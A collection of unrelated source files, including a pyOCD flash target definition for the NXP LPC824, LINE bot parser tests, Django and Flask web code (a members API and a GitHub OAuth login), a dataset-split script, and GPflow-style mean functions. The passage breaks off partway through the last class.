    0x47702000, 0x47702000, 0x4c3bb5f8, 0x25002032, 0x261f444c, 0x493960a6, 0x60206065, 0x4f384449,
    0x91004620, 0x696047b8, 0xd10b2800, 0x203460a6, 0x60206065, 0x60e04833, 0x99004620, 0x696047b8,
    0xd0002800, 0xbdf82001, 0x4d2bb5f8, 0x444d0a84, 0x492a606c, 0x60ac2032, 0x60284449, 0x460f4e28,
    0x47b04628, 0x28006968, 0x606cd10b, 0x60ac2034, 0x48246028, 0x463960e8, 0x47b04628, 0x28006968,
    0x2001d000, 0xb5f8bdf8, 0x00054614, 0x6861d10e, 0x68e26820, 0x68a11840, 0x18401889, 0x18406921,
    0x18406961, 0x184069a1, 0x61e04240, 0x0aa84e12, 0x2132444e, 0x60316070, 0x60b04910, 0x4f104449,
    0x91004630, 0x697047b8, 0xd10e2800, 0x20336075, 0x603060b4, 0x02402001, 0x480a60f0, 0x46306130,
    0x47b89900, 0x28006970, 0x2001d000, 0x0000bdf8, 0x40048040, 0x40048000, 0x00000004, 0x00000018,
    0x1fff1ff1, 0x00002ee0, 0x00000000,
    ],
    'pc_init' : 0x10000025,
    'pc_erase_sector' : 0x10000089,
    'pc_program_page' : 0x100000C7,
    'pc_eraseAll' : 0x10000049,
    # Double buffering is not supported since sector size differs from page size
    'static_base' : 0x10000000 + 0x00000020 + 0x00000128,
    'begin_data' : 0x10000000 + 0x00000800, # Analyzer uses a max of 128 B data (32 pages * 4 bytes / page)
    'begin_stack' : 0x10000800,
    'min_program_length' : 1024,
    'analyzer_supported' : True,
    'analyzer_address' : 0x10001000 # Analyzer 0x10001000..0x10000600
}
class LPC824(CoreSightTarget):
    """pyOCD target definition for the NXP LPC824: 32 KB boot flash at 0x0
    and 8 KB RAM at 0x10000000, programmed with FLASH_ALGO."""

    VENDOR = "NXP"

    MEMORY_MAP = MemoryMap(
        FlashRegion( start=0, length=0x8000, is_boot_memory=True,
            blocksize=1024,
            page_size=512,
            algo=FLASH_ALGO),
        RamRegion( start=0x10000000, length=0x2000)
        )

    def __init__(self, session):
        super(LPC824, self).__init__(session, self.MEMORY_MAP)
        self._svd_location = SVDFile.from_builtin("LPC824.xml")

    def reset_and_halt(self, reset_type=None, map_to_user=True):
        super(LPC824, self).reset_and_halt(reset_type)
        # Remap the vector table to user flash, then load SP and PC from the
        # first two words of the (remapped) vector table.
        if map_to_user:
            self.write_memory(0x40048000, 0x2, 32)  # SYSMEMREMAP = user flash
            sp = self.read_memory(0x0)  # initial stack pointer
            pc = self.read_memory(0x4)  # reset handler address
            self.write_core_register('sp', sp)
            self.write_core_register('pc', pc)
|
def clear_app_settings_cache():
    """Drop the settings Django Pods has cached on the Silhouette app.

    Django Pods caches each setting on first access; removing the cached
    attributes forces the next access to re-read the live settings.
    """
    from silhouette.apps import Silhouette
    for cached_name in ('PATH', 'THEME', 'PATTERNS'):
        if hasattr(Silhouette.settings, cached_name):
            delattr(Silhouette.settings, cached_name)
|
from datetime import datetime
import linebot.models as models
from teitoku.parser.line_parser import LineParser
from teitoku.message.text_message import TextMessage
from teitoku.source import SourceUser, SourceGroup, SourceRoom
def test_parse_text_message_source_user():
    """A 1:1 (user) text MessageEvent is mapped onto teitoku types."""
    sent_at = datetime.utcnow()
    event = models.MessageEvent(
        sent_at.timestamp() * 1000,
        models.SourceUser("user1"),
        "reply_token",
        models.TextMessage("123", "test"))
    parsed = LineParser.parse(event)
    msg = parsed.message
    assert parsed.timestamp == sent_at
    assert msg.content == "test"
    assert msg.content_type == "text"
    assert msg.gateway == "line"
    assert isinstance(msg.source, SourceUser)
    assert msg.source.user_id == 'user1'
def test_parse_text_message_source_group():
    """A text MessageEvent from a group chat is mapped onto teitoku types,
    keeping both the group id and the sending user's id.

    Fix: removed a duplicated copy-paste assertion on message.content.
    """
    timestamp = datetime.utcnow()
    text_message = models.TextMessage("123", "test")
    source = models.SourceGroup("group1", "user1")
    message_event = models.MessageEvent(
        timestamp.timestamp() * 1000, source, "reply_token", text_message)
    parsed_request = LineParser.parse(message_event)
    parsed_message = parsed_request.message
    assert parsed_request.timestamp == timestamp
    assert parsed_message.content == "test"
    assert parsed_message.content_type == "text"
    assert parsed_message.gateway == "line"
    assert isinstance(parsed_message.source, SourceGroup)
    assert parsed_message.source.user_id == 'user1'
    assert parsed_message.source.group_id == 'group1'
def test_parse_text_message_source_room():
    """A text MessageEvent from a room is mapped onto teitoku types,
    keeping both the room id and the sending user's id.

    Fix: removed a duplicated copy-paste assertion on message.content.
    """
    timestamp = datetime.utcnow()
    text_message = models.TextMessage("123", "test")
    source = models.SourceRoom("room1", "user1")
    message_event = models.MessageEvent(
        timestamp.timestamp() * 1000, source, "reply_token", text_message)
    parsed_request = LineParser.parse(message_event)
    parsed_message = parsed_request.message
    assert parsed_request.timestamp == timestamp
    assert parsed_message.content == "test"
    assert parsed_message.content_type == "text"
    assert parsed_message.gateway == "line"
    assert isinstance(parsed_message.source, SourceRoom)
    assert parsed_message.source.user_id == 'user1'
    assert parsed_message.source.room_id == 'room1'
|
from rest_framework import mixins
from rest_framework import filters
from rest_framework import status
from rest_framework import viewsets
from rest_framework.decorators import detail_route, list_route
from rest_framework.response import Response
from members.models import Member, ComiteMembership, AcademicYear
from members.serializers import MemberSerializer, MemberCardSerializer, MemberMembershipQuerySerializer
class MemberViewSet(mixins.RetrieveModelMixin,
                    mixins.ListModelMixin,
                    viewsets.GenericViewSet):
    """
    @desc: Read-only API to visualize cerkinfo's members, plus routes for
    the current user's record and physical card registration.
    """
    queryset = Member.objects.all()
    serializer_class = MemberSerializer
    # ?search= matches the related user's name fields; ?ordering= is free-form.
    filter_backends = (
        filters.SearchFilter,
        filters.OrderingFilter
    )
    search_fields = ('user__username', 'user__first_name', 'user__last_name')

    @list_route(methods=['get', 'post'])
    def self(self, request, pk=None, **kwargs):
        # Return the Member record of the authenticated user.
        # NOTE(review): POST is accepted but behaves exactly like GET here,
        # and Member.objects.get() raises DoesNotExist (-> 500) when the
        # request user has no Member row — confirm both are intended.
        current = Member.objects.get(user=request.user)
        serializer = MemberSerializer(current)
        return Response(serializer.data)

    @detail_route(methods=['post'])
    def register_member_card(self, request, pk=None):
        # Attach a physical card id to the member's membership for a year.
        serializer = MemberCardSerializer(data=request.data)
        if serializer.is_valid():
            # NOTE(review): get_or_create() with the 'year__slug' lookup works
            # for the "get" half, but the "create" half cannot build a row
            # from a '__' lookup and would raise — confirm a ComiteMembership
            # always exists before this is called.
            ms = ComiteMembership.objects.get_or_create(
                member_id=serializer.data['member'],
                year__slug=serializer.data['year']
            )[0]
            ms.card_id = serializer.data['id']
            ms.paid = serializer.data['paid']
            ms.save()
            return Response({'status': 'card id registered'})
        else:
            return Response(
                serializer.errors,
                status=status.HTTP_400_BAD_REQUEST
            )
class MemberMembershipQuery(mixins.RetrieveModelMixin,
                            mixins.ListModelMixin,
                            viewsets.GenericViewSet):
    """
    @desc: API endpoint to verify if a card_id is one of a member.
    @args{card_id}: A {card_id} argument is passed in the url to verify if the
    {card_id} is one of a member.
    """
    queryset = Member.objects.all()
    serializer_class = MemberSerializer

    def get_queryset(self):
        # An unmatched (or absent) card_id simply yields an empty result set.
        cid = self.kwargs.get('card_id', None)
        return Member.objects.filter(card_id=cid)
|
from flask import request, g, url_for
from flask_restful import Resource
from flask_jwt_extended import create_access_token, create_refresh_token
from oauth import github
from models.user import UserModel
class GithubLogin(Resource):
    """Entry point of the GitHub OAuth flow: redirects the client to GitHub's
    authorization page, pointing back at the GithubAuthorize callback."""
    @classmethod
    def get(cls):
        # _external=True builds an absolute callback URL, as GitHub requires.
        return github.authorize(url_for('github.authorized', _external=True))
class GithubAuthorize(Resource):
    """OAuth callback: exchanges the GitHub authorization for our own JWTs,
    creating a local user on first login.

    Fixes: the error branch used request.args['error'], which raises
    KeyError when GitHub omits the parameter, and returned the error body
    with an implicit 200; it now uses .get() and an explicit 400.
    """
    @classmethod
    def get(cls):
        resp = github.authorized_response()
        if resp is None or resp.get('access_token') is None:
            error_response = {
                'error': request.args.get('error', 'unknown_error'),
                'error_description': request.args.get('error_description', '')
            }
            return error_response, 400
        # Token getter registered with the oauth client reads g.access_token.
        g.access_token = resp['access_token']
        github_user = github.get('user')
        github_username = github_user.data['login']
        user = UserModel.find_by_username(github_username)
        if not user:
            # First login through GitHub: create a passwordless local account.
            user = UserModel(username=github_username, password=None)
            user.save_to_db()
        access_token = create_access_token(identity=user.id, fresh=True)
        refresh_token = create_refresh_token(user.id)
        return {'access_token': access_token, 'refresh_token': refresh_token}, 200
"""reviews models."""
# Django
from django.db import models
# Models
from apps.users.models import User
class Review(models.Model):
    """Review base model. All reviews extend this abstract model so that
    product kinds beyond cameras or lenses can be reviewed without
    duplicating the common fields."""

    # Short headline shown in listings.
    title = models.CharField(max_length=30)
    # Free-text body of the review.
    content = models.TextField(max_length=800)
    # Reviews are removed together with their author.
    author = models.ForeignKey(User, on_delete=models.CASCADE)

    class Meta:
        """Meta option."""
        abstract = True
'''
Randomly assign images in a folder to a training, validation, and test set.
~ Christopher Pramerdorfer
'''
import os
import sys
import pickle
import random
import json
rng = 1337 # rng seed
frac_test = 0.1535 # test fraction
frac_val = 0.0905 # val fraction of training set (after removing test samples)
source = '/mnt/storage/datasets/image-manipulation/RAISE/RAISE20-1300-1337/images' # directory to read from
dest = '/mnt/storage/datasets/image-manipulation/RAISE/RAISE20-1300-1337/tvt-{}-{}-{}.json'.format(rng, frac_test, frac_val) # file to save to
imext = '.png' # file ending of images
# -------
# Sanity checks: refuse to run without a source dir or over an existing split.
if not os.path.isdir(source):
    sys.exit('"{}" is no directory'.format(source))
if os.path.exists(dest):
    sys.exit('"{}" already exists'.format(dest))
# -------
# sorted() makes the subsequent seeded shuffle reproducible regardless of
# the filesystem's directory listing order.
ims = sorted([f for f in os.listdir(source) if f.endswith(imext)])
print('{} images found'.format(len(ims)))
random.seed(rng)
random.shuffle(ims)
# Split off the test set first, then the validation set from what remains.
idx = int(len(ims)*(1.0-frac_test))
itest = ims[idx:]
ims = ims[:idx]
idx = int(len(ims)*(1.0-frac_val))
ival = ims[idx:]
itrain = ims[:idx]
print(' {} training images'.format(len(itrain)))
for im in itrain:
    print('  {}'.format(im))
print(' {} validation images'.format(len(ival)))
for im in ival:
    print('  {}'.format(im))
print(' {} test images'.format(len(itest)))
for im in itest:
    print('  {}'.format(im))
# Persist the three file lists so downstream jobs use the identical split.
with open(dest, 'w') as f:
    json.dump({'train': itrain, 'val': ival, 'test': itest}, f, indent=2, separators=(',', ': '))
print('Split information saved to "{}"'.format(dest))
|
# Copyright 2016 James Hensman, alexggmatthews, PabloLeon, Valentine Svensson
# Copyright 2018 KAIST under XAI Project supported by Ministry of Science and ICT, Korea
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tensorflow as tf
import numpy as np
from .param import Param, ParamList, Parameterized
from ._settings import settings
from layers import affine_relu_forward, affine_forward
float_type = settings.dtypes.float_type
np_float_type = np.float32 if float_type is tf.float32 else np.float64
class MeanFunction(Parameterized):
    """
    The base mean function class.

    To implement a mean function, write the __call__ method. This takes a
    tensor X and returns a tensor m(X). In accordance with the GPflow
    standard, each row of X represents one datum, and each row of Y is computed
    independently for each row of X.

    MeanFunction classes can have parameters, see the Linear class for an
    example.
    """
    def __call__(self, X):
        # BUG FIX: the original used a backslash string continuation, which
        # embedded the source indentation (a long run of spaces) inside the
        # error message text.
        raise NotImplementedError(
            "Implement the __call__ method for this mean function")

    def __add__(self, other):
        """Return a mean function computing self(X) + other(X)."""
        return Additive(self, other)

    def __mul__(self, other):
        """Return a mean function computing self(X) * other(X)."""
        return Product(self, other)
class Zero(MeanFunction):
    """Mean function that is identically zero: m(X) = 0 for every row."""
    def __call__(self, X, X_train=None):  # modified
        n_rows = tf.shape(X)[0]
        out_shape = tf.stack([n_rows, 1])
        return tf.zeros(out_shape, dtype=float_type)
class Linear(MeanFunction):
    """
    Linear mean function: y_i = A x_i + b.
    """
    def __init__(self, A=None, b=None):
        """
        A is a matrix which maps each element of X to Y, b is an additive
        constant.

        If X has N rows and D columns, and Y is intended to have Q columns,
        then A must be D x Q, b must be a vector of length Q.
        """
        if A is None:
            A = np.ones((1, 1))
        if b is None:
            b = np.zeros(1)
        MeanFunction.__init__(self)
        self.A = Param(np.atleast_2d(A))
        self.b = Param(b)

    def __call__(self, X):
        """Return X @ A + b."""
        return tf.matmul(X, self.A) + self.b
class Constant(MeanFunction):
    """Constant mean function: y_i = c for every row of X."""
    def __init__(self, c=None):
        MeanFunction.__init__(self)
        if c is None:
            c = np.zeros(1)
        self.c = Param(c)

    def __call__(self, X):
        """Tile c so one copy is returned per row of X."""
        n_rows = tf.shape(X)[0]
        c_row = tf.reshape(self.c, (1, -1))
        return tf.tile(c_row, tf.stack([n_rows, 1]))
class SwitchedMeanFunction(MeanFunction):
    """
    This class enables to use different (independent) mean_functions respective
    to the data 'label'.
    We assume the 'label' is stored in the extra (last) column of X.
    """
    def __init__(self, meanfunction_list):
        MeanFunction.__init__(self)
        # Every entry must itself be a MeanFunction so it can be called on X.
        for m in meanfunction_list:
            assert isinstance(m, MeanFunction)
        self.meanfunction_list = ParamList(meanfunction_list)
        self.num_meanfunctions = len(self.meanfunction_list)
    def __call__(self, X):
        # Extract the integer label from the last column of X.
        ind = tf.gather(tf.transpose(X), tf.shape(X)[1]-1)  # ind = X[:,-1]
        ind = tf.cast(ind, tf.int32)
        # Drop the label column before evaluating the mean functions.
        X = tf.transpose(tf.gather(tf.transpose(X), tf.range(0, tf.shape(X)[1]-1)))  # X = X[:,:-1]
        # split up X into chunks corresponding to the relevant likelihoods
        x_list = tf.dynamic_partition(X, ind, self.num_meanfunctions)
        # apply the likelihood-function to each section of the data
        results = [m(x) for (x, m) in zip(x_list, self.meanfunction_list)]
        # stitch the results back together in the original row order; the
        # partitions of the row indices mirror the partitions of the rows.
        partitions = tf.dynamic_partition(tf.range(0, tf.size(ind)), ind, self.num_meanfunctions)
        return tf.dynamic_stitch(partitions, results)
class Additive(MeanFunction):
    """Pointwise sum of two mean functions: m(X) = first(X) + second(X)."""
    def __init__(self, first_part, second_part):
        MeanFunction.__init__(self)
        self.add_1 = first_part
        self.add_2 = second_part

    def __call__(self, X):
        left = self.add_1(X)
        right = self.add_2(X)
        return tf.add(left, right)
class Product(MeanFunction):
    """Pointwise product of two mean functions: m(X) = first(X) * second(X)."""
    def __init__(self, first_part, second_part):
        MeanFunction.__init__(self)
        self.prod_1 = first_part
        self.prod_2 = second_part

    def __call__(self, X):
        left = self.prod_1(X)
        right = self.prod_2(X)
        return tf.multiply(left, right)
class TwoLayerSigmoidMLP(MeanFunction):
    """
    (Custom) Two layer MLP with sigmoid hidden activation.

    When ``is_class`` is true, a sigmoid is also applied to the output layer.
    """
    def __init__(self, W1=None, W2=None, b1=None, b2=None, input_dim=1, hidden_dim=10, output_dim=1, is_class=False):
        if W1 is None:
            W1 = 1e-1 * np.random.randn(input_dim, hidden_dim)
        if W2 is None:
            W2 = 1e-1 * np.random.randn(hidden_dim, output_dim)
        if b1 is None:
            b1 = np.zeros(hidden_dim)
        if b2 is None:
            b2 = np.zeros(output_dim)
        MeanFunction.__init__(self)
        self.W1 = Param(np.atleast_2d(W1))
        self.W2 = Param(np.atleast_2d(W2))
        self.b1 = Param(b1)
        self.b2 = Param(b2)
        self.is_class = is_class

    def __call__(self, X, X_train=None):
        hidden = tf.sigmoid(tf.matmul(X, self.W1) + self.b1)
        out = tf.matmul(hidden, self.W2) + self.b2
        if self.is_class:
            return tf.sigmoid(out)
        return out
class MixtureExpertsMLP2(MeanFunction):
    """
    (Custom) Mixture of experts with a two-layer sigmoid MLP as each expert.
    Number of experts is 2; a sigmoid gate on X blends the two outputs.
    """
    def __init__(self, W1_1=None, W1_2=None, b1_1=None, b1_2=None, W2_1=None, W2_2=None, b2_1=None, b2_2=None,
                 input_dim=1, hidden_dim=10, output_dim=1, is_class=False):
        # Expert 1 parameters
        W1_1 = 1e-1*np.random.randn(input_dim, hidden_dim) if W1_1 is None else W1_1
        W1_2 = 1e-1*np.random.randn(hidden_dim, output_dim) if W1_2 is None else W1_2
        b1_1 = np.zeros(hidden_dim) if b1_1 is None else b1_1
        b1_2 = np.zeros(output_dim) if b1_2 is None else b1_2
        # Expert 2 parameters
        W2_1 = 1e-1*np.random.randn(input_dim, hidden_dim) if W2_1 is None else W2_1
        W2_2 = 1e-1*np.random.randn(hidden_dim, output_dim) if W2_2 is None else W2_2
        b2_1 = np.zeros(hidden_dim) if b2_1 is None else b2_1
        b2_2 = np.zeros(output_dim) if b2_2 is None else b2_2
        # Gate parameter: with 2 experts a single sigmoid suffices
        # (expert numbers - 1 gate outputs).
        W = 1e-1*np.random.randn(input_dim, 1) # expert numbers - 1
        MeanFunction.__init__(self)
        self.W1_1 = Param(np.atleast_2d(W1_1))
        self.W1_2 = Param(np.atleast_2d(W1_2))
        self.b1_1 = Param(b1_1)
        self.b1_2 = Param(b1_2)
        self.W2_1 = Param(np.atleast_2d(W2_1))
        self.W2_2 = Param(np.atleast_2d(W2_2))
        self.b2_1 = Param(b2_1)
        self.b2_2 = Param(b2_2)
        self.W = Param(np.atleast_2d(W))
    def __call__(self, X, X_train=None):
        # Each expert is a two-layer MLP with sigmoid hidden activation.
        e1 = tf.matmul(tf.sigmoid(tf.matmul(X, self.W1_1) + self.b1_1), self.W1_2) + self.b1_2
        e2 = tf.matmul(tf.sigmoid(tf.matmul(X, self.W2_1) + self.b2_1), self.W2_2) + self.b2_2
        # Gate weights sum to one: g1 in (0,1), g2 = 1 - g1.
        g1 = tf.sigmoid(tf.matmul(X, self.W))
        g2 = 1 - g1
        return (e1*g1) + (e2*g2)
class MixtureExpertsMLP4(MeanFunction):
    """
    (Custom) Mixture of experts with a two-layer sigmoid MLP as each expert.
    Number of experts is 4 (docstring previously said 2); a softmax gate
    over X blends the four expert outputs.
    """
    def __init__(self, W1_1=None, W1_2=None, b1_1=None, b1_2=None, W2_1=None, W2_2=None, b2_1=None, b2_2=None,
                 W3_1=None, W3_2=None, b3_1=None, b3_2=None, W4_1=None, W4_2=None, b4_1=None, b4_2=None,
                 input_dim=1, hidden_dim=10, output_dim=1, is_class=False):
        # Expert 1 parameters
        W1_1 = 1e-1*np.random.randn(input_dim, hidden_dim) if W1_1 is None else W1_1
        W1_2 = 1e-1*np.random.randn(hidden_dim, output_dim) if W1_2 is None else W1_2
        b1_1 = np.zeros(hidden_dim) if b1_1 is None else b1_1
        b1_2 = np.zeros(output_dim) if b1_2 is None else b1_2
        # Expert 2 parameters
        W2_1 = 1e-1*np.random.randn(input_dim, hidden_dim) if W2_1 is None else W2_1
        W2_2 = 1e-1*np.random.randn(hidden_dim, output_dim) if W2_2 is None else W2_2
        b2_1 = np.zeros(hidden_dim) if b2_1 is None else b2_1
        b2_2 = np.zeros(output_dim) if b2_2 is None else b2_2
        # Expert 3 parameters
        W3_1 = 1e-1*np.random.randn(input_dim, hidden_dim) if W3_1 is None else W3_1
        W3_2 = 1e-1*np.random.randn(hidden_dim, output_dim) if W3_2 is None else W3_2
        b3_1 = np.zeros(hidden_dim) if b3_1 is None else b3_1
        b3_2 = np.zeros(output_dim) if b3_2 is None else b3_2
        # Expert 4 parameters
        W4_1 = 1e-1*np.random.randn(input_dim, hidden_dim) if W4_1 is None else W4_1
        W4_2 = 1e-1*np.random.randn(hidden_dim, output_dim) if W4_2 is None else W4_2
        b4_1 = np.zeros(hidden_dim) if b4_1 is None else b4_1
        b4_2 = np.zeros(output_dim) if b4_2 is None else b4_2
        # Gate softmax parameter: one logit per expert.
        W = 1e-1*np.random.randn(input_dim, 4) # expert numbers
        MeanFunction.__init__(self)
        self.W1_1 = Param(np.atleast_2d(W1_1))
        self.W1_2 = Param(np.atleast_2d(W1_2))
        self.b1_1 = Param(b1_1)
        self.b1_2 = Param(b1_2)
        self.W2_1 = Param(np.atleast_2d(W2_1))
        self.W2_2 = Param(np.atleast_2d(W2_2))
        self.b2_1 = Param(b2_1)
        self.b2_2 = Param(b2_2)
        self.W3_1 = Param(np.atleast_2d(W3_1))
        self.W3_2 = Param(np.atleast_2d(W3_2))
        self.b3_1 = Param(b3_1)
        self.b3_2 = Param(b3_2)
        self.W4_1 = Param(np.atleast_2d(W4_1))
        self.W4_2 = Param(np.atleast_2d(W4_2))
        self.b4_1 = Param(b4_1)
        self.b4_2 = Param(b4_2)
        self.W = Param(np.atleast_2d(W))
    def __call__(self, X, X_train=None):
        # Four two-layer sigmoid MLP experts.
        e1 = tf.matmul(tf.sigmoid(tf.matmul(X, self.W1_1) + self.b1_1), self.W1_2) + self.b1_2
        e2 = tf.matmul(tf.sigmoid(tf.matmul(X, self.W2_1) + self.b2_1), self.W2_2) + self.b2_2
        e3 = tf.matmul(tf.sigmoid(tf.matmul(X, self.W3_1) + self.b3_1), self.W3_2) + self.b3_2
        e4 = tf.matmul(tf.sigmoid(tf.matmul(X, self.W4_1) + self.b4_1), self.W4_2) + self.b4_2
        # Softmax gate: one mixing weight per expert, rows sum to one.
        g = tf.nn.softmax(tf.matmul(X, self.W))
        g1 = g[:,0:1]
        g2 = g[:,1:2]
        g3 = g[:,2:3]
        g4 = g[:,3:4]
        return (e1*g1) + (e2*g2) + (e3*g3) + (e4*g4)
class TwoLayerReLUMLP(MeanFunction):
    """
    (Custom) Two layer MLP with ReLU hidden activation.

    When ``is_class`` is true, a sigmoid is applied to the output layer.
    """
    def __init__(self, W1=None, W2=None, b1=None, b2=None, input_dim=1, hidden_dim=10, output_dim=1, is_class=False):
        if W1 is None:
            W1 = 1e-1 * np.random.randn(input_dim, hidden_dim)
        if W2 is None:
            W2 = 1e-1 * np.random.randn(hidden_dim, output_dim)
        if b1 is None:
            b1 = np.zeros(hidden_dim)
        if b2 is None:
            b2 = np.zeros(output_dim)
        MeanFunction.__init__(self)
        self.W1 = Param(np.atleast_2d(W1))
        self.W2 = Param(np.atleast_2d(W2))
        self.b1 = Param(b1)
        self.b2 = Param(b2)
        self.is_class = is_class

    def __call__(self, X, X_train=None):
        # ReLU via tf.maximum(., 0), as in the original implementation.
        hidden = tf.maximum(tf.matmul(X, self.W1) + self.b1, 0)
        out = tf.matmul(hidden, self.W2) + self.b2
        return tf.sigmoid(out) if self.is_class else out
class RNN_OneLayer(MeanFunction):
    """
    (Custom) Vanilla RNN with one hidden layer.

    NOTE(review): the current __call__ only applies the linear readout
    (Wout/bout); Wemb, W and b are stored but unused here — presumably the
    recurrence happens elsewhere or is unfinished (see TODO below).
    """
    def __init__(self, Wemb=None, W=None, Wout=None, bemb=None, b=None, bout=None, \
                 input_dim=1, hidden_dim=10, output_dim=1, length=None):
        Wemb = 1e-1*np.random.randn(input_dim, hidden_dim) if Wemb is None else Wemb
        W = 1e-1*np.random.randn(2*hidden_dim, hidden_dim) if W is None else W
        Wout = 1e-1*np.random.randn(hidden_dim, output_dim) if Wout is None else Wout
        b = np.zeros(hidden_dim) if b is None else b
        bout = np.zeros(output_dim) if bout is None else bout
        MeanFunction.__init__(self)
        self.Wemb = Param(np.atleast_2d(Wemb))
        self.W = Param(np.atleast_2d(W))
        self.Wout = Param(np.atleast_2d(Wout))
        self.b = Param(b)
        self.bout = Param(bout)
        self.length = length
        self.input_dim = input_dim
        self.hidden_dim = hidden_dim
        self.output_dim = output_dim
        # dummy parameter kept so the interface matches the two-layer variant
        W2 = np.zeros((2*hidden_dim, hidden_dim))
        self.W2 = Param(np.atleast_2d(W2))
    # TODO Also, have to implement evaluating training points
    def __call__(self, X, is_predict=False, X_train=None):
        if is_predict:
            # Prediction mode: append the single test row to the training
            # rows, apply the readout, and return only the last row's output.
            length = 1
            H_pred = tf.concat([X_train, X], axis=0)
            out_pred = tf.matmul(H_pred, self.Wout) + self.bout
            return tf.reshape(out_pred[-length:, :], [length, -1])
        else:
            # Training mode: plain linear readout over all rows.
            H = X
            return tf.matmul(H, self.Wout) + self.bout
class RNN_TwoLayer(MeanFunction):
    """
    (Custom) Vanilla RNN with two hidden layers.

    __call__ runs a tanh recurrence over the rows of X using the second
    layer's weights (W2/b2) and then applies the linear readout Wout/bout.
    NOTE(review): Wemb, W and b are stored but unused in __call__ — confirm
    whether the first layer is applied upstream.
    """
    def __init__(self, Wemb=None, W=None, W2=None, Wout=None, bemb=None, b=None, b2=None, bout=None, \
                 input_dim=1, hidden_dim=10, output_dim=1, length=None):
        Wemb = 1e-1*np.random.randn(input_dim, hidden_dim) if Wemb is None else Wemb
        W = 1e-1*np.random.randn(2*hidden_dim, hidden_dim) if W is None else W
        W2 = 1e-1*np.random.randn(2*hidden_dim, hidden_dim) if W2 is None else W2
        Wout = 1e-1*np.random.randn(hidden_dim, output_dim) if Wout is None else Wout
        b = np.zeros(hidden_dim) if b is None else b
        b2 = np.zeros(hidden_dim) if b2 is None else b2
        bout = np.zeros(output_dim) if bout is None else bout
        MeanFunction.__init__(self)
        self.Wemb = Param(np.atleast_2d(Wemb))
        self.W = Param(np.atleast_2d(W))
        self.W2 = Param(np.atleast_2d(W2))
        self.Wout = Param(np.atleast_2d(Wout))
        self.b = Param(b)
        self.b2 = Param(b2)
        self.bout = Param(bout)
        self.length = length
        self.input_dim = input_dim
        self.hidden_dim = hidden_dim
        self.output_dim = output_dim
    # TODO Also, have to implement evaluating training points
    def __call__(self, X, is_predict=False, X_train=None):
        if is_predict:
            # Prediction: prepend the training rows so the recurrent state is
            # warmed up, then return only the final row's output.
            length = 1
            # W2's top rows act as the input-to-hidden map.
            H_embedded_pred = tf.matmul(tf.concat([X_train, X], axis=0), self.W2[0:self.hidden_dim, :])
            H2_pred = []
            for i in range(self.length+length):
                if i == 0:
                    H2_pred.append(tf.tanh(H_embedded_pred[i,:]))
                else:
                    # W2's bottom rows act as the hidden-to-hidden map.
                    toAdd_pred = tf.matmul(tf.reshape(H2_pred[i-1], [1, -1]), \
                                           self.W2[self.hidden_dim:2*self.hidden_dim, :]) + self.b2
                    H2_pred.append(tf.tanh(H_embedded_pred[i,:] + toAdd_pred[0, :]))
            H2_pred = tf.stack(H2_pred, axis=0)
            out_pred = tf.matmul(H2_pred, self.Wout) + self.bout
            return tf.reshape(out_pred[-length:, :], [length, -1])
        else:
            # Training: run the recurrence over all self.length rows of X.
            H_embedded = tf.matmul(X, self.W2[0:self.hidden_dim, :])
            H2 = []
            for i in range(self.length):
                if i == 0:
                    H2.append(tf.tanh(H_embedded[i,:]))
                else:
                    toAdd = tf.matmul(tf.reshape(H2[i-1], [1, -1]), \
                                      self.W2[self.hidden_dim:2*self.hidden_dim, :]) + self.b2
                    H2.append(tf.tanh(H_embedded[i,:] + toAdd[0, :]))
            H2 = tf.stack(H2, axis=0)
            return tf.matmul(H2, self.Wout) + self.bout
class RNN_OneLayer_DKGP(MeanFunction):
    """
    (Custom) One-hidden-layer RNN variant for deep-kernel GP use: the mean
    is a linear readout m(X) = X @ Wout + bout.
    """
    def __init__(self, input_dim, hidden_dim, output_dim, Wout=None, bout=None):
        # NOTE(review): hidden_dim is accepted for interface symmetry with
        # the two-layer variant but is not used here.
        if Wout is None:
            Wout = 1e-1 * np.random.randn(input_dim, output_dim)
        if bout is None:
            bout = np.zeros(output_dim)
        MeanFunction.__init__(self)
        self.Wout = Param(np.atleast_2d(Wout))
        self.bout = Param(bout)

    def __call__(self, X, X_train=None):
        return tf.matmul(X, self.Wout) + self.bout
class RNN_TwoLayer_DKGP(MeanFunction):
    """
    (Custom) Two-hidden-layer RNN variant for deep-kernel GP use.

    __call__ runs a tanh recurrence over the rows of X (treated as a
    sequence) using W2/b2, then applies the linear readout Wout/bout.
    When X has a single row and X_train is given, the training rows are
    prepended so the recurrent state is warmed up, and only the final
    row's output is returned.
    """
    def __init__(self, input_dim, hidden_dim, output_dim, W2=None, Wout=None, b2=None, bout=None):
        W2 = 1e-1*np.random.randn(input_dim+hidden_dim, hidden_dim) if W2 is None else W2
        Wout = 1e-1*np.random.randn(hidden_dim, output_dim) if Wout is None else Wout
        b2 = np.zeros(hidden_dim) if b2 is None else b2
        bout = np.zeros(output_dim) if bout is None else bout
        MeanFunction.__init__(self)
        self.W2 = Param(np.atleast_2d(W2))
        self.Wout = Param(np.atleast_2d(Wout))
        self.b2 = Param(b2)
        self.bout = Param(bout)
        self.input_dim = input_dim
        self.hidden_dim = hidden_dim
        self.output_dim = output_dim

    def __call__(self, X, X_train=None):
        length = tf.shape(X)[0]
        # BUG FIX: `is None` instead of `== None`. With array/tensor
        # arguments `==` is overloaded element-wise and does not reliably
        # test for None; identity comparison is the correct idiom (PEP 8).
        if X_train is None:
            _X = X
            _length = length
        else:
            # At prediction time (single test row) prepend the training rows.
            _X = tf.cond(tf.equal(length, 1), lambda: tf.concat([X_train, X], axis=0), lambda: X)
            _length = tf.cond(tf.equal(length, 1), lambda: tf.shape(_X)[0], lambda: length)
        # W2's top rows are the input-to-hidden map.
        Xemb = tf.matmul(_X, self.W2[0:self.input_dim, :])
        i = tf.constant(1)
        H = tf.reshape(tf.tanh(Xemb[0, :]), [1,-1])
        def cond(i, Xemb, H, _length):
            return i < _length
        def body(i, Xemb, H, _length):
            # W2's bottom rows are the hidden-to-hidden map.
            toAdd = tf.matmul(tf.reshape(H[i-1, :], [1,-1]), self.W2[self.input_dim:self.input_dim+self.hidden_dim, :]) + self.b2
            toConcat = tf.tanh(tf.reshape(Xemb[i, :], [1,-1]) + toAdd)
